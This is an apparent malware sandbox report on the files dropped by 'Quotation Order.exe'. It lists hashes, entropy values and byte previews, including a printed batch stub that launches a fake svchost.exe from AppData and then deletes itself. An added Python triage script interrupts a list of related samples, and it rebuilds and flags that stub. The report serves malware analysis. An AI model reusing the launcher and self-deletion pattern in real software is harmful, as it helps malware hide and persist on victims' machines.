                                                                                                                                                                                                                                                  SHA-512:C15213B2D7E87B75352FC20FF005B20203885897BDEDED8260C007FC5303E148BECB2CFADD8B12BB1E2026A9349840ADA53F5BC0E0EC08144CEFA820554A7449
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):13340
                                                                                                                                                                                                                                                  Entropy (8bit):2.6868564786189526
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:96:TiZYWbHlEvriUYiZYRWPkHFUYEZCntnBiLV7/dYwfIDGXWHavFGMrdowICnl3:2ZDbKFKfKWavFGMrdoHCnl3
                                                                                                                                                                                                                                                  MD5:B6F08644FF3ED85F4DC07C81E158C8D6
                                                                                                                                                                                                                                                  SHA1:35C5E273DB69E584950E7A56CD6401BA1D966724
                                                                                                                                                                                                                                                  SHA-256:2D57C1B09267B6223F204C4EB187A2DD7D9E8AAA35EC8B5530B9964C99ED7445
                                                                                                                                                                                                                                                  SHA-512:3426411A2C30342528D91D081CC49FC04B8FC1A0D5EC902A98AF77562F18917839F51A60C09AA6A331CD985AC0D5636F88F030542BC7A95B91BB8AA0E7C3617C
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):999
                                                                                                                                                                                                                                                  Entropy (8bit):4.966299883488245
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24:Jd4T7gw4TchTGBLtKEHcHGuDyeHRuDye6MGFiP6euDyRtz:34T53VGLv8HGuDyeHRuDye6MGFiP6euy
                                                                                                                                                                                                                                                  MD5:24567B9212F806F6E3E27CDEB07728C0
                                                                                                                                                                                                                                                  SHA1:371AE77042FFF52327BF4B929495D5603404107D
                                                                                                                                                                                                                                                  SHA-256:82F352AD3C9B3E58ECD3207EDC38D5F01B14D968DA908406BD60FD93230B69F6
                                                                                                                                                                                                                                                  SHA-512:5D5E65FCD9061DADC760C9B3124547F2BABEB49FD56A2FD2FE2AD2211A1CB15436DB24308A0B5A87DA24EC6AB2A9B0C5242D828BE85BD1B2683F9468CE310904
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<software_identification_tag xmlns="http://standards.iso.org/iso/19770/-2/2009/schema.xsd">...<entitlement_required_indicator>true</entitlement_required_indicator>...<product_title>Windows 10 Pro</product_title>...<product_version>....<name>10.0.19041.1865</name>....<numeric>.....<major>10</major>.....<minor>0</minor>.....<build>19041</build>.....<review>1865</review>....</numeric>...</product_version>...<software_creator>....<name>Microsoft Corporation</name>....<regid>regid.1991-06.com.microsoft</regid>...</software_creator>...<software_licensor>....<name>Microsoft Corporation</name>....<regid>regid.1991-06.com.microsoft</regid>...</software_licensor>...<software_id>....<unique_id>Windows-10-Pro</unique_id>....<tag_creator_regid>regid.1991-06.com.microsoft</tag_creator_regid>...</software_id>...<tag_creator>....<name>Microsoft Corporation</name>....<regid>regid.1991-06.com.microsoft</regid>...</tag_creator>..</software_identification_tag>..
                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Quotation Order.exe
                                                                                                                                                                                                                                                  File Type:CSV text
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):1305
                                                                                                                                                                                                                                                  Entropy (8bit):5.376949986661823
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclKsXE4Np51qE4GIs0E4KD:MxHKQwYHKGSI6o6+vxp3/elZHNp51qHa
                                                                                                                                                                                                                                                  MD5:8184A57469229249530A85C1C7AB6B68
                                                                                                                                                                                                                                                  SHA1:3EB26CA872ADFD1B7910A9E3E3C8DB250CC812F9
                                                                                                                                                                                                                                                  SHA-256:B22F01A3D672B90C06D5E9DEBD3141D9F82118C5EE6D1AC952CFE218E73320DD
                                                                                                                                                                                                                                                  SHA-512:F2006A0CC5E2D02045CF28465B629991302354FE99CD65907EF16D22F811A680CEED7D5F364C9419E13DB22EA3CAA144505D60E14E362A1E42E19494A846C09B
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\8af759007c012da690062882e06694f1\System.Management.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.3031
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Roaming\avdfUcC\avdfUcC.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):411
                                                                                                                                                                                                                                                  Entropy (8bit):5.331640912793073
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:12:Q3La/hSoDLI4MWuCIAWDLI4MWuCqDLI4MWuPTAv:MLbAE4KdAmE4K5E4KO
                                                                                                                                                                                                                                                  MD5:41DE845B592D0C0A18195E5AAB7B2A8D
                                                                                                                                                                                                                                                  SHA1:AB0656E0E0137593BE7984F44B4603407C6F7A32
                                                                                                                                                                                                                                                  SHA-256:ECC1BC8EFC8E479E0D7E1B4934F298B074A1D5AACAA3A73490CCCF2BFF440908
                                                                                                                                                                                                                                                  SHA-512:F4F84F2E23A2A11D6FB0BC00384A051B7811E65DD2DE9CE4CF2923247B5721A3A0B8DB335959B15EBCD15F7A8E5E530E452B8A5A537F3C16D70BFFC6C6A654F9
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.AddIn, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Runtime.Remoting, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                  Size (bytes):64
                                                                                                                                                                                                                                                  Entropy (8bit):0.34726597513537405
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:Nlll:Nll
                                                                                                                                                                                                                                                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                                                                                                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                                                                                                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                                                                                                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:@...e...........................................................
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Users\user\Desktop\Quotation Order.exe
File Type:DOS batch file, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):148
Entropy (8bit):5.081953763814562
Encrypted:false
SSDEEP:3:mKDDCMNqTtvL5oMEREaKC5ZACSmqRDMERE2J5xAInTRI9YiVZPy:hWKqTtT6FiaZ5Omq1Fi23fTNiVk
MD5:8B377DE6416079B56663F37C330EFB30
SHA1:0642BAFD929F221D37007B6F5DDBF2F45FAE4084
SHA-256:A4E772CAE0181A997339A7809408959AC44C9A76D9DEA94E5A080A6EFDD49610
SHA-512:169E8D95A6809F31D8301F586EB33CFD875118C42509A89C8919F8D25B5971F615BBE3BCDB1E84D97D7B0481F7B65FB678D5AE1DA49EF60EB7EEFCC5A623977F
Malicious:false
Preview:@echo off..timeout 3 > NUL..START "" "C:\Users\user\AppData\Roaming\svchost.exe"..CD C:\Users\user\AppData\Local\Temp\..DEL "tmp25B.tmp.bat" /f /q..
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:modified
Size (bytes):108664
Entropy (8bit):5.8959760602012965
Encrypted:false
SSDEEP:1536:QSF7vA1hRqHNxxMjlI3ZC+0CtOss6mdcQ6A4vhZ91RKGpQJN:nA1hYPMUs6mdclA4vhNRKG4N
MD5:914F728C04D3EDDD5FBA59420E74E56B
SHA1:8C68CA3F013C490161C0156EF359AF03594AE5E2
SHA-256:7D3BDB5B7EE9685C7C18C0C3272DA2A593F6C5C326F1EA67F22AAE27C57BA1E6
SHA-512:D7E49B361544BA22A0C66CF097E9D84DB4F3759FBCC20386251CAAC6DA80C591861C1468CB7A102EEE1A1F86C974086EBC61DE4027F9CD22AD06D63550400D6D
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: DHL-7654544CNT Pdf.exe, Detection: malicious, Browse
• Filename: SecuriteInfo.com.PWSX-gen.17424.6091.exe, Detection: malicious, Browse
• Filename: Draft Document 940465898900011174774000-PDF.exe, Detection: malicious, Browse
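The batch file above is the launcher-and-cleanup stub for the svchost.exe copy dropped under AppData\Roaming: wait three seconds, start the payload, then delete itself. The Python below is an added example, not part of the Joe Sandbox report. It rebuilds the file bytes from the preview string (Joe Sandbox shows each non-printable byte as a dot, so every CRLF pair appears as ".."), checks that the result is the 148 bytes the report lists, and applies the two checks a triage script would run on such a stub: a Windows system binary name launched from outside a system directory (the logic behind the "Files With System Process Name In Unsuspected Locations" signature) and deletion of a .bat file by the script itself. The SYSTEM_BINARIES set and SYSTEM_DIRS tuple are assumptions of this example, not values taken from the report.

```python
import hashlib
import math
import re
from pathlib import PureWindowsPath

# Preview string copied from the report entry above. Joe Sandbox renders each
# non-printable byte as '.', so every CRLF pair appears as '..'. This script
# contains no literal "..", so the substitution in reconstruct() is unambiguous.
PREVIEW = (
    '@echo off..timeout 3 > NUL..'
    'START "" "C:\\Users\\user\\AppData\\Roaming\\svchost.exe"..'
    'CD C:\\Users\\user\\AppData\\Local\\Temp\\..'
    'DEL "tmp25B.tmp.bat" /f /q..'
)

# Assumed (not from the report): binary names that only belong under
# %SystemRoot%\System32 or SysWOW64. Extend to taste.
SYSTEM_BINARIES = {"svchost.exe", "csrss.exe", "lsass.exe", "winlogon.exe",
                   "services.exe", "smss.exe", "wininit.exe"}
# Assumed (not from the report): directories where those names are legitimate.
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")

# START [ "title" ] "path"  (only quoted targets are handled here)
START_RE = re.compile(r'^\s*start\s+(?:"[^"]*"\s+)?"([^"]+)"', re.IGNORECASE)
# DEL ... something.bat
DEL_BAT_RE = re.compile(r'^\s*del\b[^\r\n]*\.bat\b', re.IGNORECASE)


def reconstruct(preview: str) -> bytes:
    """Rebuild the on-disk bytes of the batch file from the report preview."""
    return preview.replace("..", "\r\n").encode("ascii")


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy, the metric behind the report's 'Entropy (8bit)'."""
    if not data:
        return 0.0
    n = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def masquerading_targets(batch: bytes) -> list:
    """Paths launched via START whose basename is a system binary name but
    whose directory is not a Windows system directory."""
    hits = []
    for line in batch.decode("ascii").split("\r\n"):
        m = START_RE.match(line)
        if not m:
            continue
        path = m.group(1)
        if (PureWindowsPath(path).name.lower() in SYSTEM_BINARIES
                and not path.lower().startswith(SYSTEM_DIRS)):
            hits.append(path)
    return hits


def self_deletes(batch: bytes) -> bool:
    """True if the script DELetes a .bat file: the launch-then-cleanup
    pattern that leaves no script on disk once the payload is running."""
    return any(DEL_BAT_RE.match(line)
               for line in batch.decode("ascii").split("\r\n"))


def triage(preview: str) -> dict:
    """Reconstruct the file and return size, hashes, entropy and indicators."""
    data = reconstruct(preview)
    return {
        "size": len(data),
        "md5": hashlib.md5(data).hexdigest().upper(),
        "sha256": hashlib.sha256(data).hexdigest().upper(),
        "entropy": round(shannon_entropy(data), 6),
        "masquerading": masquerading_targets(data),
        "self_delete": self_deletes(data),
    }


if __name__ == "__main__":
    for key, value in triage(PREVIEW).items():
        print(f"{key}: {value}")
```

The size check is the cheap sanity test: 148 bytes proves the ".." to CRLF substitution recovered every byte. The printed MD5 and entropy should then match the report's 8B377DE6416079B56663F37C330EFB30 and 5.081953763814562; if they do not, the preview was truncated or a literal ".." was swallowed, and the file should be pulled from the sandbox rather than trusted from the preview. The masquerading check deliberately keys on the basename alone, because the Sigma-style rule it mirrors is about a system process name in an unexpected location, not about the file's actual contents.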
                                                                                                                                                                                                                                                  • Filename: DHL DETAILS.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: payment.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: New Order 7003153933.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: SecuriteInfo.com.Win32.TrojanX-gen.10939.30166.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: Purchase Order.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: CHEMICAL SPECIFICATION.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: Quotation.pdf.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....<.]..............0..X...........v... ........@.. ..............................O.....`.................................\v..O.......$............f..xB..........$u............................................... ............... ..H............text....V... ...X.................. ..`.rsrc...$............Z..............@..@.reloc...............d..............@..B.................v......H.......(...................xE..$t......................................2~P....o....*.r...p(....*VrK..p(....s.....P...*..0.._.......~....:O....>.....%.rm..p...A...s......su....%.r...p...A...s....rm..p.su....%.r...p...B...s......su....%.r...p...B...s....r...p.su....%.r...p...C...s......su....%.r...p...C...s....r...p.su....%.r...p...D...s......su....%.r...p...D...s....r...p.su....%.r...p...E...s......su....%..r...p...E...s....r...p.su....%..r...p...F...s......su....%..r...p...F
                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Quotation Order.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):912780
                                                                                                                                                                                                                                                  Entropy (8bit):7.719141613124118
